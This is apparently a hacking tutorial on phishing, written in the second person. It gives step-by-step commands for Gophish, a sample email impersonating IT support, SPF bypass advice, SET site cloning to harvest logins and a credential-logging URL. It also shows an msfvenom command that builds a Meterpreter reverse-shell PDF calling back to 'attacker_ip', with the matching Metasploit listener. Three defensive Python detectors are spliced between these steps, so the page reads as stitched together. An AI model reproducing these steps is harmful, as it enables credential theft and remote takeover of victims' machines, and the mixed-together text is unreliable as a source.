Introduction to Social Engineering
Social engineering is a technique that manipulates human behavior and emotions to gain access to sensitive information or prompt actions that compromise security, bypassing traditional technical defenses. Instead of exploiting system vulnerabilities, social engineering targets the natural tendencies of individuals, such as trust, curiosity, or fear, to deceive them into revealing confidential data or performing actions that benefit the attacker. This can take many forms, including phishing, where fraudulent emails are used to trick recipients into divulging passwords or clicking malicious links; website spoofing, where attackers create fake versions of trusted websites to steal login credentials; and impersonation, where attackers pose as legitimate entities or authority figures to gain trust and extract information. These tactics exploit the human element of security, which is often the weakest link, making social engineering one of the most effective and dangerous attack vectors in cybersecurity.
Online Social Engineering Techniques
Phishing
Phishing is an essential social engineering technique used to manipulate individuals into performing actions, such as clicking a malicious link or providing sensitive information. To perform a phishing campaign, you need to craft emails that appear legitimate, often imitating trusted entities like banks, online services, or government agencies. The goal is to deceive the target into clicking on a link or downloading an attachment, which leads to credential harvesting or malware installation.
Phishing campaigns can range from simple, generic messages to more targeted attacks, such as spear phishing, which personalizes the content based on information gathered about the victim. This makes the message more believable and increases the likelihood of success.
Phishing Tools and Setup
To perform a phishing campaign, a range of tools are available to design, execute, and track the success of the campaign. One of the most commonly used tools is Gophish, an open-source phishing framework that allows you to create, manage, and track phishing emails. Below are detailed steps and commands for setting up and executing a phishing campaign using Gophish and other tools.
Video Credit: DemmSec - GoPhish
Setting Up Gophish
To begin setting up a phishing campaign using Gophish, follow these steps:
Download Gophish:
wget https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip
Unzip the file:
unzip gophish-v0.11.0-linux-64bit.zip
Navigate to the extracted folder:
cd gophish
Run Gophish:
./gophish
Once Gophish is running, access the Gophish dashboard by opening your browser and navigating to http://localhost:3333. The default credentials are username: admin and password: gophish. From the dashboard, configure email templates, create campaigns, and track the success of the phishing attack.
Crafting Phishing Emails
To craft an effective phishing email, mimic a trusted entity by modifying the "From" address, subject line, and email body. Here’s an example email format that impersonates a trusted IT department:
From: IT Support <it-support@fakecompany.com>
Subject: Important Account Update - Action Required
Body: Please click the link below to verify your account information: <a href="http://maliciouslink.com">Verify Account</a>
Make sure to customize the content based on the organization or individual being targeted. For spear phishing campaigns, personalize the email by including information relevant to the target, such as their job role or recent activities, which can be gathered using OSINT tools.
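From the receiving side, the indicators a mail filter or SOC analyst keys on are exactly the ones the example above relies on: an external sender domain behind an internal-sounding display name, urgency wording, and link text pointing at a host outside the organisation. The following Python script is an added example, not code from the page; KNOWN_DOMAINS, ROLE_NAMES and the embedded sample message are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed for the example: domains the organisation legitimately sends from.
KNOWN_DOMAINS = {"realcompany.com"}
ROLE_NAMES = re.compile(r"it support|helpdesk|administrator|security team", re.I)
URGENCY = re.compile(r"action required|verify your account|immediately|suspended", re.I)

# Constructed sample mirroring the page's "IT Support" phishing email.
SAMPLE = """From: IT Support <it-support@fakecompany.com>
Subject: Important Account Update - Action Required
Content-Type: text/html

Please click the link below to verify your account information:
<a href="http://maliciouslink.com">Verify Account</a>
"""

class LinkCollector(HTMLParser):
    # Collect (href, visible text) pairs for every <a> in an HTML body.
    def __init__(self):
        super().__init__()
        self.links, self._href = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
    def handle_data(self, data):
        if self._href is not None and data.strip():
            self.links.append((self._href, data.strip()))
    def handle_endtag(self, tag):
        if tag == "a":
            self._href = None

def phishing_indicators(raw):
    """Return human-readable findings for a raw RFC 822 message; [] means clean."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    body = "".join(p.get_payload() for p in msg.walk()
                   if p.get_content_type() in ("text/plain", "text/html"))
    findings = []
    if domain not in KNOWN_DOMAINS:
        findings.append(f"sender domain {domain!r} is not an organisation domain")
        if ROLE_NAMES.search(name):
            findings.append(f"display name {name!r} imitates an internal role")
    if URGENCY.search(msg.get("Subject", "") + " " + body):
        findings.append("urgency or credential-verification wording")
    collector = LinkCollector()
    collector.feed(body)
    for href, text in collector.links:
        host = (urlparse(href).hostname or "").lower()
        if host and host not in KNOWN_DOMAINS:
            findings.append(f"link {text!r} points to external host {host}")
    return findings
```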
Email Spoofing
Email spoofing is necessary to make the phishing email appear as if it is coming from a legitimate source. Use tools like King Phisher or manually forge email headers. To spoof the "From" field, configure email server settings or bypass security mechanisms such as SPF (Sender Policy Framework) validation.
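SPF is the control that turns a forged "From" into a detectable failure: the receiving server looks up the sending domain's v=spf1 record and checks whether the connecting IP is authorised by it. The evaluator below is an added example (not code from the page) that handles the ip4, ip6 and all mechanisms and, as a DMARC-style check, requires the validated envelope domain to align with the visible From domain; the DNS-dependent mechanisms (a, mx, include) are assumed not to match so the example runs offline, and the record and addresses are constructed.

```python
import ipaddress

# Constructed record; a real check fetches the domain's TXT record over DNS.
RECORD = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 -all"

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

def check_spf(record, sender_ip):
    """Evaluate sender_ip against a v=spf1 record string (ip4/ip6/all only)."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"                      # mechanisms default to "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.lower().partition(":")
        if name == "all":
            return QUALIFIERS[qualifier]     # "-all": anything else fails
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
        # a, mx, include, exists need DNS; assumed non-matching in this example.
    return "neutral"                         # nothing matched and no "all" term

def evaluate_message(record, sender_ip, mail_from, header_from):
    """Return (spf_result, aligned, accepted): accepted only on pass + alignment."""
    result = check_spf(record, sender_ip)
    envelope_domain = mail_from.rpartition("@")[2].lower()
    visible_domain = header_from.rpartition("@")[2].lower()
    aligned = envelope_domain == visible_domain
    return result, aligned, (result == "pass" and aligned)
```

The alignment step matters because an attacker can pass SPF for a domain they control while still displaying a different domain in the From header; the combined verdict rejects that case.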
Setting Up a Fake Login Page
After a phishing email is delivered, direct victims to a fake login page where they will enter their credentials. Use SET (Social Engineering Toolkit) to clone legitimate websites and set up phishing landing pages. Follow these steps to clone a website using SET:
Open the Social Engineering Toolkit (SET) in your terminal:
setoolkit
From the SET main menu, select the following options:
1) Social Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
When prompted, enter the URL of the website you wish to clone (e.g., https://example.com):
Enter the URL to clone: https://example.com
SET will now create a fake login page based on the website you cloned. When a user inputs their credentials, they will be captured and logged for further use. Configure Gophish to direct users to this fake page by linking the malicious URL in the phishing email.
Tracking and Collecting Credentials
Once a victim clicks the link in the phishing email, they will be directed to the fake login page created by SET. To track user interactions and collect credentials, monitor the Gophish dashboard for engagement metrics such as clicks, submissions, and opened emails. For every credential submission, the data is logged and stored for future reference:
http://attacker-server.com/login?username=[USERNAME]&password=[PASSWORD]
Video Credit: Loi Liang Yang - Virus.PDF
Delivering Phishing Payloads
Phishing attacks often go beyond simple credential harvesting. In more advanced cases, the goal may be to deliver a malicious payload directly to the target’s machine. This can be done by embedding the payload in an email attachment, such as a PDF, or by providing a link to download a malicious file. The embedded payload, when executed, allows remote access to the victim’s machine or execution of other malicious actions.
To create a reverse shell payload and embed it into a PDF using Metasploit and msfvenom, use the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f pdf > malicious.pdf
This command generates a reverse TCP Meterpreter shell for Windows and embeds it in a PDF file. Replace attacker_ip with your local IP address (the system that will receive the reverse shell) and LPORT=4444 with the port that will listen for the reverse connection.
Once the PDF is created, it can be attached to a phishing email, encouraging the target to download and open it under the guise of an important document. Upon opening, the payload inside the PDF is executed, creating a reverse shell connection back to the attacker’s machine.
To capture the reverse shell connection, set up a listener in Metasploit with the following commands:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit
With this listener active, it will wait for the reverse shell connection. When the victim opens the malicious PDF, the connection is established, and you gain control of the target system using Meterpreter, where you can issue commands, upload/download files, and escalate privileges.
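On the endpoint, the behaviour described above leaves two telltale events: a document reader making an outbound connection on a non-web port, and a document reader spawning a shell or scripting host. The detection below is an added example (not code from the page) that runs those two rules over constructed EDR-style key=value telemetry; the field names, process lists and log lines are assumptions for the example.

```python
import re

# Assumed process names; tune to the readers and shells in your estate.
DOC_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "winword.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe", "rundll32.exe"}
EXPECTED_PORTS = {80, 443}          # update checks and licensing use HTTPS/HTTP

KV = re.compile(r"(\w+)=(\S+)")

# Constructed telemetry: line 3 and line 4 model a PDF-delivered reverse shell.
SAMPLE_LINES = [
    "2024-05-01T10:01:58Z host=WS-0142 event=netconn proc=AcroRd32.exe pid=4412 dst=198.51.100.20 dport=443",
    "2024-05-01T10:02:03Z host=WS-0142 event=netconn proc=chrome.exe pid=2210 dst=198.51.100.21 dport=4444",
    "2024-05-01T10:02:11Z host=WS-0142 event=netconn proc=AcroRd32.exe pid=4412 dst=203.0.113.5 dport=4444",
    "2024-05-01T10:02:12Z host=WS-0142 event=procstart proc=cmd.exe pid=4530 parent=AcroRd32.exe",
]

def parse_event(line):
    """Turn one key=value telemetry line into a dict (timestamp is dropped)."""
    return dict(KV.findall(line))

def detect_reverse_shell(lines):
    """Return an alert string for every line matching either rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        proc = ev.get("proc", "").lower()
        parent = ev.get("parent", "").lower()
        if ev.get("event") == "netconn" and proc in DOC_READERS:
            port = int(ev.get("dport", "0"))
            if port not in EXPECTED_PORTS:
                alerts.append(f"{ev.get('host')}: {proc} connected out to {ev.get('dst')}:{port}")
        elif ev.get("event") == "procstart" and parent in DOC_READERS and proc in SHELLS:
            alerts.append(f"{ev.get('host')}: {parent} spawned {proc}")
    return alerts

if __name__ == "__main__":
    for alert in detect_reverse_shell(SAMPLE_LINES):
        print("ALERT", alert)
```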
Spear Phishing with OSINT Tools
Spear phishing is more targeted and effective because it involves gathering detailed information about the victim before launching the attack. Use OSINT tools like theHarvester or Maltego to collect relevant information on the target, such as email addresses, phone numbers, social media profiles, and job roles. This data can be used to craft a more convincing phishing email, increasing the likelihood of the target interacting with it.
To gather email addresses from public sources, you can use theHarvester, a powerful OSINT tool that helps collect information such as emails, subdomains, IPs, and more from various public sources. For example, you can use theHarvester to search for email addresses associated with a specific domain:
theHarvester -d targetdomain.com -b google
In this command:
-d targetdomain.com: Specifies the target domain you are investigating. Replace targetdomain.com with the actual domain you want to gather email addresses from.
-b google: Defines the source to query for the information. In this case, google is the search engine being used, but you can also specify other sources such as Bing, LinkedIn, or others supported by theHarvester.
Once executed, theHarvester will search through the specified source (Google in this case) and return a list of email addresses, subdomains, and other information associated with the target domain. This data can be valuable for spear-phishing campaigns, further reconnaissance, or simply gathering contact information for a security audit.
You can also modify the command to search multiple sources at once or specify additional options for more advanced data collection:
theHarvester -d targetdomain.com -b google,bing,linkedin -l 500
In this command:
-b google,bing,linkedin: Queries multiple sources, increasing the likelihood of finding relevant information.
-l 500: Limits the number of results from each source to 500, ensuring a broader data collection.
By using tools like theHarvester, you can automate the process of gathering publicly available information, which is especially useful in reconnaissance phases of cybersecurity assessments, penetration testing, or targeted attacks like spear-phishing.
Phishing campaigns are an effective way to gain unauthorized access to sensitive information. Tools like Gophish streamline the creation and execution of phishing emails, while SET and Metasploit can be used to clone websites and deliver malware payloads. Properly tracking engagement metrics and gathering credentials through Gophish ensures the success of the campaign. For more targeted attacks, spear phishing, supported by OSINT tools, makes the attack even more effective.